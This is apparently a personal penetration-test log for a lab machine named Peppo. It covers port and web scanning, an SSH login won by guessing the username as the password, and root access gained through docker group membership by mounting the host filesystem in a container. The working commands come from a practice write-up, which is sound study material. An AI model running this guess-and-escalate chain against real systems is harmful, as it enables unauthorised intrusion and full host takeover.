Peppo
๐งช Pentest Log: {{date:2025-08-13}}
๐ Target Information
- Machine Name: Peppo
- IP Address: 192.168.148.60
- Operating System: Linux
ip=192.168.148.60
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 8080
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 10000
auth-owners: eleanor
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 22
- Vulnerability Type: N/A
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
try eleanor:eleanor
ssh eleanor@$ip
๐งฌ Privilege Escalation
๐ค Current Access
- User: eleanor
- Groups: eleanor,24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
- Shell Type: ssh
๐ Enumeration
Group:
id
found
999(docker)
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Docker Abuse
- Target Binary/Service: docker
- Reference / Source: N/A
๐ง Exploit Steps
- Smash to root
docker images
docker run -v /:/mnt --rm -it redmine chroot /mnt bash